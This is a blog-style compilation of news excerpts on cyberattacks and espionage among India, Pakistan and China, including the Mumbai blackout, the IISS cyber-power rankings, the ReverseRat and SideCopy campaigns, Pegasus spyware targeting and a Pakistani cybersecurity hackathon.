It was the worst blackout in decades in India’s financial capital, stopping trains and prompting hospitals to switch to diesel powered generators. The megacity has long prided itself on being one of the few cities in India with uninterrupted power supply even as most of the country struggles with regular blackouts.
Anil Deshmukh, home minister of the state, said officials were investigating a possible connection between the blackout and a surge in cyberattacks on the servers of the state power utilities. He wouldn’t single out China, but said investigators had found evidence of more than a dozen Trojan horse attacks as well as suspicious data transfers into the servers of state power companies.
“There were attempts to login to our servers from foreign land,” said Mr. Deshmukh. “We will investigate further.”
Another state official said 8GB of unaccounted for data slipped into power company servers from China and four other countries between June and October. The official cited thousands of attempts by blacklisted IP addresses to access the servers.
State-sponsored hackers increasingly target critical infrastructure such as power grids instead of specific institutions, said Amit Dubey, a cybersecurity expert at Root64 Foundation, which conducts cybercrime investigations.
“Anything and everything is dependent on power,” Mr. Dubey said. Targeting power supply, he said, can “take down hundreds of plants or day-to-day services like trains.”
Mr. Dubey said many countries such as China, Russia and Iran are deploying state-sponsored hackers to target the power grids of other nations. Russian hackers succeeded in turning off the power in many parts of Ukraine’s capital a few years ago, he said, and have also attacked critical infrastructure in the U.S. in recent years.
India’s announcement came after U.S. cybersecurity firm Recorded Future on Sunday published a report outlining what it said were attacks from close to a China-linked group it identified as RedEcho. It cited a surge in attacks targeting India’s power infrastructure.
The report said the attacks could have been a reaction to the jump in border tension between the two countries. During a military skirmish in June, India said 20 Indian soldiers were killed and China said four Chinese soldiers were killed when soldiers fought with rocks, batons and clubs wrapped in barbed wire.
In response to the Recorded Future report, which was earlier reported by the New York Times, China said it doesn’t support cyberattacks.
“It is highly irresponsible to accuse a particular party when there is no sufficient evidence around,” Wang Wenbin, spokesman for China’s Ministry of Foreign Affairs said in a briefing Monday. “China is firmly opposed to such irresponsible and ill-intentioned practice.
Recorded Future said it couldn’t directly connect the attacks to the Mumbai blackout because it doesn’t have access to any hardware that might have been infected.
India’s Ministry of Power said it has dealt with the threats outlined in the Recorded Future report by strengthening its firewall, blocking IP addresses and using antivirus software to scan and clean its systems software.
IISS Report: #India has some #cyber-intelligence & offensive cyber capabilities but they are focused on #Pakistan. #Delhi is building new capability with the help of key international partners – including #US, #UK & #France. #Cyberwar https://indianexpress.com/article/india/focused-on-pakistan-rather-than-china-india-in-tier-3-as-cyberpower-report-7378610/ via @IndianExpr
Cyberpower, in the study, is measured on seven parameters: from strategy to cybersecurity. India’s reform in cyber governance has been slow. It should better harness its digital start-up ecosystem, says the study.
Greg Austin, who leads the IISS programme on Cyber, Space and Future Conflict and played a leading role in the preparation of the report, told The Indian Express Sunday: “India has some cyber-intelligence and offensive cyber capabilities but they are regionally focused, principally on Pakistan. It is currently aiming to compensate for its weaknesses by building new capability with the help of key international partners – including the US, the UK and France – and by looking to concerted international action to develop norms of restraint.”
The report said that India’s approach towards institutional reform of cyber governance has been “slow and incremental”, with key coordinating authorities for cyber security in the civil and military domains established only as late as 2018 and 2019 respectively.
These work closely with the main cyber-intelligence agency, the National Technical Research Organisation.
“India has a good regional cyber-intelligence reach but relies on partners, including the United States, for wider insight”, the report said.
It said that the strengths of the Indian digital economy include a vibrant start-up culture and a very large talent pool. “The private sector has moved more quickly than the government in promoting national cyber security.”
The country is active and visible in cyber diplomacy but has not been among the leaders on global norms, preferring instead to make productive practical arrangements with key states, the report said.
“India is a third-tier cyber power whose best chance of progressing to the second tier is by harnessing its great digital-industrial potential and adopting a whole-of-society approach to improving its cyber security,” the report said.
The report also assessed China’s cyber power as clearly inferior to that of the US, and substantially below the combined cyber power of the US network of alliances.
The countries covered in this report are US, United Kingdom, Canada and Australia (four of the Five Eyes intelligence allies); France and Israel (the two most cyber-capable partners of the Five Eyes states); Japan (also an ally of the Five Eyes states, but less capable in the security dimensions of cyberspace, despite its formidable economic power); China, Russia, Iran and North Korea (the principal states posing a cyber threat to Western interests); and India, Indonesia, Malaysia and Vietnam (four countries at earlier stages in their cyber-power development). It is an ongoing study, which will cover a total of 40 countries, including Germany, Singapore, Nigeria among others.
India has been put in the third tier meant for countries that have strengths or potential strengths in some of these categories but “significant weaknesses” in others. Also in this category are: Japan, Iran, Indonesia, Vietnam, Malaysia and North Korea.
In the second tier, with world-leading strengths in “some” categories are: Australia, Canada, China, France, Israel, Russia and the United Kingdom.
IISS: Cyber Capabilities and National Power: A Net Assessment
London-based THE INTERNATIONAL INSTITUTE FOR STRATEGIC STUDIES
India has frequently been the victim of cyber attacks, including on its critical infrastructure, and has attributed a significant proportion of them to China or Pakistan. CERT-In reported, for example, that there were more than 394,499 incidents in 2019,44 and 2020 saw an upsurge in attacks from China.45 Of particular concern to the Indian government are cyber attacks by North Korea that use Chinese digital infrastructure.46 The vast major- ity of the cyber incidents flagged by CERT-In appear to have been attempts at espionage,47 but they could also have resulted in serious damage to the integrity of
Indian networks and platforms. In 2020, India had the second-highest incidence of ransomware attacks in the world48 and the government banned 117 Chinese mobile applications because of security concerns.49
Public statements by Indian officials and other open- source material indicate that India has developed rela- tively advanced offensive cyber capabilities focused on Pakistan. It is now in the process of expanding these capabilities for wider effect.
India reportedly considered a cyber response against Pakistan in the aftermath of the November 2008 terror- ist attacks in Mumbai, with the NTRO apparently at the forefront of deliberations.67 A former national security advisor has since indicated publicly that India pos- sesses considerable capacity to conduct cyber-sabotage operations against Pakistan,68 which appears credible
Overall, India’s focus on Pakistan will have given it useful operational experience and some viable regional offensive cyber capabilities. It will need to expand its cyber-intelligence reach to be able to deliver sophisti- cated offensive effect further afield, but its close collab- oration with international partners, especially the US, will help it in that regard.
Raj Chengappa and Sandeep Unnithan, ‘How to Punish Pakistan’, India Today, 22 September 2016, https://www. indiatoday.in/magazine/cover-story/story/20161003-uri- attack-narendra-modi-pakistan-terror-kashmir-nawaz-sharif- india-vajpayee-829603-2016-09-22.
Pakistan-linked hackers targeted Indian power company with ReverseRat
A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research.
"Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan," Lumen's Black Lotus Labs said in a Tuesday analysis. "The potentially compromised victims aligned with the government and power utility verticals."
Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization. The covert operation is said to have begun at least in January 2021.
The intrusions are notable for a number of reasons, not least because in addition to its highly-targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and the use of compromised domains in the same country as the targeted entity to host their malicious files.
At the same time, the group has been careful to hide their activity by modifying the registry keys, granting them the ability to surreptitiously maintain persistence on the target device without attracting attention.
Explaining the multi-step infection chain, Lumen noted the campaign "resulted in the victim downloading two agents; one resided in-memory, while the second was side-loaded, granting threat actor persistence on the infected workstations."
The attack commences with a malicious link sent via phishing emails or messages that, when clicked, downloads a ZIP archive file containing a Microsoft shortcut file (.lnk) and a decoy PDF file from a compromised domain.
The shortcut file, besides displaying the benign document to the unsuspecting recipient, also takes care of stealthily fetching and running an HTA (HTML application) file from the same compromised website.
The lure documents largely describe events catering to India, disguising as a user manual for registering and booking an appointment for COVID-19 vaccine through the CoWIN online portal, while a few others masquerade as the Bombay Sappers, a regiment of the Corps of Engineers of the Indian Army.
Pegasus was used to hack mobiles of Pak officials
New Delhi: Mobile phones of around 30 Pakistani government servants, who include serving army generals, officials attached with the ISI and senior bureaucrats, were hacked into by using Pegasus spying software during April and May 2019.
Pegasus takes control of the infected phone by entering the system through WhatsApp.
While the Pakistan government has so far kept the matter under wraps, possibly to avoid panic and public embarrassment, it, however, issued a special secret advisory to heads of departments, a copy of which was also sent to the secretary of Prime Minister Imran Khan, asking them to replace all phones purchased before 10 May 2019 immediately and prohibiting the transfer of official documents by using WhatsApp.
The hacking of the mobile numbers of around 30 officials—the exact number is known only to the group/individual/organisation that hacked into the phones—has sparked a frenzy among government officials because of speculation that key documents and vital information might have landed in unintended hands and offices across borders.
Information and classified documents that are generally found in the mobile phones of top government officials, are regarded as invaluable by both foreign government agencies and private operators as they give valuable insights into otherwise closely guarded policies and plans.
The Sunday Guardian reached out to the NSO Group, the Israel-based company that owns Pegasus, with a detailed questionnaire regarding the recent development. In a statement, the NSO Group said: “To protect the ongoing public safety missions of its agency customers and given significant legal and contractual constraints, NSO Group is not able to disclose who is or is not a client or discuss specific uses of its technology, as explained in its Transparency Statement of Principles. However, the company’s products are licensed only to government intelligence and law enforcement agencies for the sole purpose of preventing and investigating terror and serious crime. NSO’s technology is only licensed after a thorough vetting process that goes well beyond the legal requirements that we follow. All potential customers must meet strict export authority regulations before any sale, in addition to NSO’s internal vetting process that includes a focus on human rights. NSO’s governance framework aligns us with the UN Guiding Principles on Business and Human Rights and sets the highest standards in the cyber intelligence industry, embedding human rights due diligence into everything we do.”
This newspaper also shared its questions with the Pakistan high commission in New Delhi, and Pakistan’s Ministry of Information Technology & Telecom for response. However, no response was shared until the time the story went to press.
The NSO group gained some kind of notoriety after it emerged that Pegasus had infected at least 1,400 numbers across the world through WhatsApp. Facebook, the owner of WhatsApp, has already filed a suit against NSO in US courts for illegally breaking into WhatsApp.
Despite the controversy it has attracted in recent times, “Q Cyber Technologies”, the parent company of NSO, continues to remain active in the world of cyber espionage. It was one of the main sponsors of “ISS World Asia”—touted as the world’s largest gathering of law enforcement agencies, intelligence analysts, electronic surveillance and intelligence gathering—which was held in Kuala Lumpur, Malaysia in the first week of December.
In the said event, “Q Cyber Technologies” had defined itself as a company that equipped select intelligence agencies, militaries and law enforcement organisations around the world with the strategic, tactical and analytical technology capabilities required to ensure the success of their operations in fighting crime and terrorism.
India’s Gandhi and Pakistan’s Khan tapped as targets in Israeli NSO spyware scandal - Tech News - Haaretz.com
Prominent Indian politician Rahul Gandhi and Pakistani Prime Minister Imran Khan were selected as potential targets of the Israeli-made Pegasus spyware program by clients of the NSO Group cyberespionage firm, a global investigation can reveal Monday.
Additional potential targets included Pakistani officials, including a number once associated with Pakistani leader Khan. They also included Kashmiri separatists, leading Tibetan religious figures and even an Indian supreme court judge. Khan did not respond to a request for comment from the Washington Post.
Gandhi, who said he changes phones every few months to avoid being hacked, said in response: “Targeted surveillance of the type you describe, whether in regard to me, other leaders of the opposition or indeed any law-abiding citizen of India, is illegal and deplorable.
According to an analysis of the Pegasus Project records, more than 180 journalists were selected in 21 countries by at least 12 NSO clients. The potential targets and clients hail from Bahrain, Morocco, Saudi Arabia, India, Mexico, Hungary, Azerbaijan, Togo and Rwanda.
India is Israel’s biggest arms market, buying around $1 billion worth of weapons every year, according to Reuters. The two countries have grown closer since Modi became Indian prime minister in 2014, widening commercial cooperation beyond their longstanding defense ties. Modi became the first sitting Indian leader to visit Israel in July 2017, while former Prime Minister Benjamin Netanyahu held a state visit to India at the start of 2018
#Pakistan #ISI has a record of discovering & breaking up #US #CIA spy agents rings: “Historic Pakistani success in identifying people working for the CIA was a driving force behind the cable, the people familiar with the matter said.” #intelligence https://www.washingtonpost.com/national-security/cia-warning-human-sources-risk/2021/10/05/6e761a02-2613-11ec-8d53-67cfb452aa60_story.html
Counterintelligence officials at the CIA’s headquarters in Langley, Va., have dispatched a cable to officers around the world cautioning them to take greater care in handling human sources, who are at risk of being captured or killed by rival intelligence services, according to people familiar with the matter.
The cable reflected a general concern among the agency’s leadership that its operations officers should pay more attention to protecting their agents, while also recognizing that they have to aggressively recruit spies and informants to perform their intelligence-collection mission, according to the people who spoke on the condition of anonymity to describe a sensitive matter.
Such notices to the field — known as worldwide stations and bases cables (WWSB) — are routine, former officials said. People familiar with the recent cable said it wasn’t prompted by any new penetration of a spy network. But, they added, the cable underscored concerns that CIA officers may be putting recruitment ahead of basic source-protection techniques.
Historic Pakistani success in identifying people working for the CIA was a driving force behind the cable, the people familiar with the matter said.
The CIA is under renewed pressure to recruit and maintain effective spy networks in Pakistan, following the U.S. withdrawal from neighboring Afghanistan and the country’s takeover by the Taliban. Maintaining reliable human sources will be crucial to the Biden administration’s plans to keep tabs on terrorist threats without a military presence on the ground, former officials said.
The CIA cable was first reported by the New York Times.
“These go out every two or three years on counterintelligence concerns. They’re not unusual but are still important reminders to officers to tighten up on tradecraft,” said Thad Troy, a former CIA operations officer who served as a chief of station in several European capitals. Troy said he had not seen the recent cable.
In an unusually revealing detail, the cable noted the number of agents killed by foreign intelligence services. That level of specificity might ordinarily be excluded from a cable that is widely disseminated, as this one was, but it was included to get the attention of CIA officers, who might otherwise regard the bulletin as a routine advisory, people familiar with the message said.
When asked about the cable, a CIA spokeswoman declined to comment.
The CIA has suffered some disastrous penetrations of its spy networks in recent years. In 2011, the agency launched a mole-hunt after an informant in China told his American handlers that everyone he knew who was helping the U.S. government had been discovered by Chinese authorities, who then forced the agents to work for them.
CIA assets in Iran were also identified and arrested in another penetration around the same time.
In both instances, former officials said that agents were probably discovered because of a breach in the CIA’s covert communications system, which it used to secretly communicate with agents in the field.
By invoking previous failures, the cable was probably meant to admonish current officers not to repeat past mistakes.
“If this is being sent to the workforce [rather than a particular CIA station], the message is, ‘Hey, people, let’s be careful,” said Daniel Hoffman, a former intelligence officer who held senior positions overseas and at headquarters.
Hoffman, who hasn’t seen the cable, said that if the agency wanted to send a more urgent message about an active counterintelligence problem — such as a particular group of sources being compromised — it would handle the matter in a more discreet message to the officers concerned.
Facebook says hackers in Pakistan targeted Afghan users amid government collapse
Hackers from Pakistan used Facebook to target people in Afghanistan with connections to the previous government during the Taliban's takeover of the country, the company's threat investigators said in an interview with Reuters.
Facebook (FB.O) said the group, known in the security industry as SideCopy, shared links to websites hosting malware which could surveil people's devices. Targets included people connected to the government, military and law enforcement in Kabul, it said. Facebook said it removed SideCopy from its platform in August.
The social media company, which recently changed its name to Meta, said the group created fictitious personas of young women as "romantic lures" to build trust and trick targets into clicking phishing links or downloading malicious chat apps. It also compromised legitimate websites to manipulate people into giving up their Facebook credentials.
"It's always difficult for us to speculate as to the end goal of the threat actor," said Facebook's head of cyber espionage investigations, Mike Dvilyanski. "We don't know exactly who was compromised or what the end result of that was."
Major online platforms and email providers including Facebook, Twitter Inc (TWTR.N), Alphabet Inc's (GOOGL.O) Google and Microsoft Corp's (MSFT.O) LinkedIn have said they took steps to lock down Afghan users' accounts during the Taliban's swift takeover of the country this past summer. read more
Facebook said it had not previously disclosed the hacking campaign, which it said ramped up between April and August, due to safety concerns about its employees in the country and the need for more work to investigate the network. It said it shared information with the U.S. State Department at the time it took down the operation, which it said had appeared "well-resourced and persistent."
Mr. Modi has used the Israeli spyware to not only spy on his critics at home but also his perceived enemies abroad. Pakistani Prime Minister Imran Khan is among the most prominent targets of the Modi government's cyber attacks, according to a recently released Project Pegasus report. The Indian government has neither confirmed nor denied the report. The focus of the report is the use of the Israeli-made spyware by about a dozen governments to target politicians, journalists and activists. The users of the Pegasus software include governments of Bahrain, Morocco, Saudi Arabia, India, Mexico, Hungary, Azerbaijan, Togo and Rwanda.
National Center for Cyber Security For Cyber Threats
Becoming an anonymous personality is a super easy task in the online space. All that one needs to do is hide the IP. The IP address makes it easier to trace online activities. You can find your IP address on What Is My IP. However, just because cyber threats exist, it does not mean one can prevent oneself from engaging in online activities. With proper digital hygiene along with government efforts, a country can mitigate cyber threats.
In 2018, the Government of Pakistan established the National Centre for Cyber Security or NCCS. It was a joint initiative of the Planning Commission and Higher Education Commission. The body currently works in cybercrime forensics, smart devices, and network security.
New ways of committing cyber crimes are emerging with each passing year. Therefore, research and development are critical in fighting different cyber crimes. It is where the role of the National Center for Cyber Security comes in. NCCS deals with both applied and theoretical areas for fighting cybercrime.
It is known for its research on areas like Cyber Reconnaissance, Cybercrime Investigations, Blockchain Security, Digital Forensics, IoT Security, Intrusion Detection Systems, Mobile Phone Security, Internet Security and Privacy, Critical Infrastructure Security and Malware Analysis.
Cyber Security Policy Of Pakistan Is Evolving
In addition to bodies like NCCS, it is also important to have a solid cybersecurity policy. The Government of Pakistan recently approved a new cybersecurity policy to fight electronic crime. The policy will prove to be helpful for both the public and private institutions in fighting cybercrime. The policy will birth a secure cyber ecosystem in the country with the help of new governance and institutional framework. It will additionally support a computer emergency response team and a security operations centre at the institutional, sector and national level.
Further, the Government of Pakistan will work on improving general awareness of cyber security amongst the passes through public awareness campaigns, skill development and training programs.
Why Is Cyber Security Knowledge Important?
Security awareness is important in all sectors, including the domain of cyber security too. The interconnected system is essential to survive in the current digitised world. However, it comes with a risk a cyber security knowledge can mitigate. Without proper cyber security knowledge, it is easy to fall prey to online crime. The result will be that people will start losing their trust in the digital world, which can prove dangerous for any country in the digital age of digitisation.
Further, it is not enough to ensure the technology and infrastructure required to support it. Government should inform the people about the risks and help them fight it. Only through these methods can a country lay a strong foundation for further digitisation of the country.
Pakistan’s ranking on the Global CyberSecurity Index is disappointing. Therefore, the newly brought cyber security policy was a much-needed change to improve its ranking in future studies. With strong cyber security laws, Pakistan can promote easy socio-economic development. Thankfully, the Government of Pakistan is working towards it. For instance, a cyberattack on any Pakistan institution under the new policy will be considered an act of aggression against national sovereignty. The government will take all the necessary steps to punish the offender for dealing with it.
Ignite Conducts Karachi Qualifier Round of Digital Pakistan Cybersecurity Hackathon 2022
Ignite National Technology Fund, a public sector company with the Ministry of IT & Telecom, conducted the qualifier round of Digital Pakistan Cybersecurity Hackathon 2022 in Karachi on 1st December 2022 after conducting qualifier rounds at Quetta and Lahore.
The Cybersecurity Hackathon aims to improve the cybersecurity readiness, protection, and incident response capabilities of the country by conducting cyber drills at a national level and identifying cybersecurity talent for public and private sector organizations.
Dr. Zain ul Abdin, General Manager Ignite, stated that Ignite was excited about organizing Pakistan’s 2nd nationwide cybersecurity hackathon in five cities this year. The purpose of the Cyber Security Hackathon 2022 is to train and prepare cyber security experts in Pakistan, he said.
Speaking on the occasion, Asim Shahryar Husain, CEO Ignite, said, “The goal of the cybersecurity hackathon is to create awareness about the rising importance of cybersecurity for Pakistan and also to identify and motivate cybersecurity talent which can be hired by public and private sector organizations to secure their networks from cyberattacks.”
“There is a shortage of 3-4 million cybersecurity professionals globally. So this is a good opportunity for Pakistan to build capacity of its IT graduates in cybersecurity so that they can boost our IT exports in future,” he added.
Chief guest, Mohsin Mushtaq, Additional Secretary (Incharge) IT & Telecommunication, said, “Digital Pakistan Cybersecurity Hackathon is a step towards harnessing the national talent to form a national cybersecurity response team.”
“Ignite will continue to hold such competitions every year to identify new talent. I would like to congratulate CEO Ignite and his team for holding such a marathon competition across Pakistan to motivate cybersecurity students and professionals all over the country,” he added.
Top cybersecurity experts were invited for keynote talks during the occasion including Moataz Salah, CEO Cyber Talents, Egypt, and Mehzad Sahar, Group Head InfoSec Engro Corp, who delivered the keynote address on Smart InfoSec Strategy.
Panelists from industry, academia, and MoITT officials participated in two panel discussions on “Cyber Threats and Protection Approaches” and “Indigenous Capability & Emerging Technologies” during the event.
The event also included a cybersecurity quiz competition in which 17 teams participated from different universities. The top three teams in the competition were awarded certificates.
41 teams competed from Karachi in the Digital Pakistan Cybersecurity Hackathon 2022.
The top three teams shortlisted after the eight-hour hackathon were: “Team Control” (Winner); “Revolt” (1st Runner-up); and “ASD” (2nd Runner-up).
These top teams will now compete in the final round of the hackathon in Islamabad later this month.
Post a Comment